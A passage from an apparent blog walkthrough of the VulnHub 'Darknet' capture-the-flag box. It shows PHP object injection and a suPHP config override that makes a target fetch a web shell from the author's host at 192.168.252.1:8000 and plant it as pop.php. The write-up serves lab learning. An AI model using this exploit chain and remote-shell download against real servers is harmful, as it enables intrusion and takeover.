        $f=fopen($this-&gt;path.&quot;/&quot;.$this-&gt;name_file, &quot;w&quot;);
        fwrite($f, $data);
        fclose($f);
        chmod($this-&gt;path.&quot;/&quot;.$this-&gt;name_file, 0644);
}
}

?&gt;
</code></pre>

<p>Show.php</p>

<pre><code>&lt;?php

class Show {

    public $woot;

    function __toString(){
        return &quot;Showme&quot;;        

}
    function Pwnme(){
        $this-&gt;woot=&quot;ROOT&quot;;

}

}

?&gt;
</code></pre>

<p>A textbook example of <a href="https://www.owasp.org/index.php/PHP_Object_Injection">PHP Object Injection</a>! I continued to serialize an instance of of the <code>Show</code> class by copying the class into a new PHP file, instantiating the <code>Show</code> class and running the <code>serialize()</code> function over it, printing the output.</p>

<pre><code>// Source code for poishow.php
&lt;?php

class Show {

    public $woot;

    function __toString(){
        return &quot;Showme&quot;;

}
    function Pwnme(){
        $this-&gt;woot=&quot;ROOT&quot;;

}

}

print_r(serialize(new Show()));
</code></pre>

<p>Running this with a PHP interpreter printed the serialized string.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# php poishow.php
O:4:&quot;Show&quot;:1:{s:4:&quot;woot&quot;;N;}
</code></pre>

<p>I now had something I could use to try and test the vulnerability. For the <code>Show</code> class, we are going to leverage the <code>__toString()</code> method defined when <code>sec.php</code> calls <code>echo</code> on the variable containing the unserialized object. I write <em>yet another python helper</em> to send the serialized objects to the <code>sec.php</code> as a POST parameter. This was mostly because I was too lazy to deal with my shell and escaping the quotes etc. :)</p>

<pre><code>import requests

OBJECT = &quot;&quot;&quot;O:4:&quot;Show&quot;:1:{s:4:&quot;woot&quot;;N;}&quot;&quot;&quot;

print('[+] Exploiting the PHP Object Injection Bug')
r = requests.post('http://192.168.252.140/sec.php', data={'test': OBJECT})
print r.status_code
print r.text
</code></pre>

<p>Running this made the server still respond with an HTTP 500 error. Hmm. I was stuck here for quite some time trying to figure out if I can get some form of logging somewhere that I can read. At some stage, I came across <code>/etc/suphp</code> and realized that the configuration file for it is writable.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_suphp_writable.png" />
    
    
</figure>


<p>The <code>suphp.conf</code> file had an entry <code>logfile=/var/log/suphp/suphp.log</code> which I changed to log to <code>/tmp</code>, hoping for it to reveal some information about the error code I was getting. To do this, I downloaded the file, modified the entry, and used my web shell&rsquo;s upload functionality to override the original configuration file. This worked just fine, apart from the fact that that logfile too was not readable by me :(</p>

<p>Some time later, I realized that there were two more configuration options in the configuration file that are of interest.</p>

<pre><code>; Minimum UID
min_uid=100

; Minimum GID
min_gid=100
</code></pre>

<p>Remember that the PHP scripts we are trying to access are owned by <code>root</code>? Turns out that this is a security feature of <a href="http://www.suphp.org/">suPHP</a> to prevent scripts with too high permissions to run. So, I modify the configuration file again to replace the values with <code>0</code> and upload it to override the original.</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_signal8_xpanel_suphp_override.png" />
    
    
</figure>


<p>This time, when I try and access the <code>sec.php</code> script, I am provided with no output. Great! Back to the original Object Injection that I was trying to exploit, I rerun my python script to test the <code>unserialize()</code>.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# python phpObjectInjection.py
[+] Exploiting the PHP Object Injection Bug
200
Showme
</code></pre>

<p>The <code>Showme</code> output is expected as the <code>__toString()</code> method is set to return this when the class should be represented as a string. Neat.</p>

<p>The next step was then to serialize an object with my desired values for the <code>Test</code> class&rsquo;s properties. Following the logic of the <code>__destruct()</code> method, it was clear to see that it would call a URL, write the contents to file and chmod the file accordingly. To do this, I added the <code>Test</code> class and set the values in my original script.</p>

<pre><code>&lt;?php

class Show {

    public $woot;

    function __toString(){
        return &quot;Showme&quot;;

}
    function Pwnme(){
        $this-&gt;woot=&quot;ROOT&quot;;

}

}

class Test {

    public $url;
    public $name_file;
    public $path;

    function __destruct(){
        # Commented out as this will run when this script
        # also finishes :D

        #$data=file_get_contents($this-&gt;url);
        #$f=fopen($this-&gt;path.&quot;/&quot;.$this-&gt;name_file, &quot;w&quot;);
        #fwrite($f, $data);
        #fclose($f);
        #chmod($this-&gt;path.&quot;/&quot;.$this-&gt;name_file, 0644);
}
}


$test = new Test();
$test-&gt;url = 'http://192.168.252.1:8000/shell.txt';
$test-&gt;name_file = 'pop.php';
$test-&gt;path = '/var/www';

print_r(serialize([$test, new Show()]));
</code></pre>

<p>Running this would then print out the serialized versions of the two classes in question.</p>

<pre><code>root@kali:~/data/VulnHub/Darknet# php poi.php
a:2:{i:0;O:4:&quot;Test&quot;:3:{s:3:&quot;url&quot;;s:35:&quot;http://192.168.252.1:8000/shell.txt&quot;;s:9:&quot;name_file&quot;;s:7:&quot;pop.php&quot;;s:4:&quot;path&quot;;s:8:&quot;/var/www&quot;;}i:1;O:4:&quot;Show&quot;:1:{s:4:&quot;woot&quot;;N;}}
</code></pre>

<p>The only thing that is left to do is host the <code>shell.txt</code> file at the location specified in the <code>$url</code> property and run the little python helper with the new serialized string. I started up a HTTP server with <code>python -m SimpleHTTPServer</code> and wrote my web shell to <code>shell.txt</code>. The python helper was changed so that <code>OBJECT</code> had the new serialized string.</p>

<pre><code>OBJECT = &quot;&quot;&quot;a:2:{i:0;O:4:&quot;Test&quot;:3:{s:3:&quot;url&quot;;s:35:&quot;http://192.168.252.1:8000/shell.txt&quot;;s:9:&quot;name_file&quot;;s:7:&quot;pop.php&quot;;s:4:&quot;path&quot;;s:8:&quot;/var/www&quot;;}i:1;O:4:&quot;Show&quot;:1:{s:4:&quot;woot&quot;;N;}}&quot;&quot;&quot;
</code></pre>

<p>I ran the helper and saw that the <code>shell.txt</code> was downloaded from my web server. I could now browse to <a href="http://192.168.252.140/pop.php">http://192.168.252.140/pop.php</a> :D</p>

<h2 id="flag">flag</h2>

<p>Using the shell uploaded, I was finally able to cat the flag!</p>


<figure >
    
        <img src="https://leonjza.github.io/images/darknet_flag.png" />
    
    
</figure>


<h2 id="final-thoughts">final thoughts</h2>

<p>I went back to a few of the source files to get an idea for whats going on once the box was rooted. The first being the weirdness when I tried to brute force the first elements of the node in the XPath injection. Turns out, a <code>preg_match()</code> was applied to filter out a few inputs.</p>

<pre><code>if(!empty($_GET['id'])){
    $id=$_GET['id'];
    if(preg_match('/\*/', $id)){
        exit();
}
</code></pre>

<p>Next, the original SQL injection bug was also filtering out some input.</p>

<pre><code>if(preg_match(&quot;/select|and|[&gt;,=&lt;\-;]/&quot;, $user)){
    echo &quot;Ilegal&quot;;
    exit();
</code></pre>

<p>In the end, I learnt a lot! Thanks <a href="https://twitter.com/Q3rv0">@Q3rv0</a></p>

  </div>
  <div id="disqus_thread"></div>
</div>


<script type="text/javascript">
var disqus_shortname = "slashnote";
(function () {
    var s = document.createElement('script'); s.async = true;
    s.type = 'text/javascript';
    s.src = '//' + disqus_shortname + '.disqus.com/count.js';
    (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>



<script type="text/javascript">
    var disqus_shortname = "slashnote";
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>

<script src="https://leonjza.github.io/js/highlight.pack.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
</body>
</html>

